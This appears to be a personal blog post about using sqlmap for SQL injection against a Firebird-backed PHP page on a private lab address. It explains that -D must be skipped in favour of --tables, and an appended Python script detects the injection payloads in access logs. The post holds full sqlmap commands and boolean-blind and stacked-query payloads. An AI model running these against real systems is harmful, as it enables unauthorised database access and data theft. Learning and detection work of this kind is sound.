Tuesday, July 31, 2012

Ignore switch -D on Firebird (sqlmap)

Hi there, I want to share my experience.
I found an error on 192.168.56.102/index.php?page=beritaDetail&id=103, so I used sqlmap to retrieve the databases. I typed this in sqlmap:
"./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbs"
A few minutes later I had a problem: my sqlmap couldn't retrieve the database names.
This is the result:
"sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=beritaDetail&id=103' AND 6088=6088 AND 'lDMw'='lDMw

    Type: stacked queries
    Title: Firebird stacked queries (heavy query)
    Payload: page=beritaDetail&id=103'; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3;--
---

[14:16:45] [INFO] the back-end DBMS is Firebird

web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: Firebird 2.0
[14:16:45] [WARNING] on Firebird it is not possible to enumerate databases
[14:16:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.102'

[*] shutting down at 14:16:45
"
I tried reading the sqlmap user's manual at http://sqlmap.sourceforge.net/doc/README.html. sqlmap supports attacking this database (Firebird), and this is the list of databases:

  • Firebird: python-kinterbasdb.
  • Microsoft Access: python-pyodbc.
  • Microsoft SQL Server: python-pymssql.
  • MySQL: python-mysqldb.
  • Oracle: python cx_Oracle.
  • PostgreSQL: python-psycopg2.
  • SQLite: python-pysqlite2.
  • Sybase: python-pymssql.

But why can't my sqlmap retrieve the database names?

     So I asked my friend how to get a solution. He answered that it means sqlmap won't be able to retrieve database names, as everything goes in a single one. I just have --tables, and I must ignore switch -D on Firebird (the same goes for SQLite and MS Access).

    So I tried ignoring -D, like this:
    "./sqlmap.py -u "192.168.56.102/index.php?page=beritaDetail&id=103" -p id --level 3 --risk 3 --thread 8 --dbms Firebird --tables"
    And what I saw was that I could get through this problem. This is the result:
    "web application technology: PHP 5.3.1, Apache 2.2.14
    back-end DBMS: Firebird 2.0
    [14:33:30] [INFO] fetching tables for database: Firebird_masterdb
    [14:33:30] [INFO] fetching number of tables for database 'Firebird_masterdb'"
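
On the server side, the two payloads in the first sqlmap output above leave recognisable traces in the web access log. The following Python is an added example, not part of the original post or of sqlmap: it flags the numeric tautology, the stacked SELECT and any reference to Firebird's RDB$/MON$ system tables in request parameters. The log entries, the client address 192.0.2.10 and the name classify are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Firebird keeps its metadata in RDB$*/MON$* system tables; a page
# parameter has no ordinary reason to name them.
FIREBIRD_META = re.compile(r"\b(?:RDB|MON)\$[A-Z_]+", re.I)
# Numeric tautology, as in the boolean-based blind payload: AND 6088=6088
TAUTOLOGY = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)
# Statement terminator followed by a second SELECT (stacked query).
STACKED = re.compile(r";\s*SELECT\b", re.I)
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (not real traffic); the payloads are
# URL-encoded the way they would appear in the log.
_PRE = ('192.0.2.10 - - [31/Jul/2012:14:16:41 +0000] '
        '"GET /index.php?page=beritaDetail&id=103')
_POST = ' HTTP/1.1" 200 5120'
SAMPLE_LOG = [
    _PRE + _POST,
    _PRE + "%27%20AND%206088%3D6088%20AND%20%27lDMw%27%3D%27lDMw" + _POST,
    _PRE + "%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20RDB%24FIELDS%20AS%20T1"
           "%2CRDB%24TYPES%20AS%20T2%2CRDB%24COLLATIONS%20AS%20T3%3B--" + _POST,
]

def classify(log_line):
    """Return sorted 'parameter:finding' strings for one log line."""
    match = REQUEST.search(log_line)
    if not match:
        return []  # not an HTTP request line this parser understands
    findings = set()
    # parse_qsl splits on '&' first and percent-decodes each value after.
    for name, value in parse_qsl(urlsplit(match.group(1)).query,
                                 keep_blank_values=True):
        if FIREBIRD_META.search(value):
            findings.add(f"{name}:firebird-metadata")
        if TAUTOLOGY.search(value):
            findings.add(f"{name}:boolean-tautology")
        if STACKED.search(value):
            findings.add(f"{name}:stacked-query")
    return sorted(findings)

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or "clean", "<-", line.split('"')[1])
```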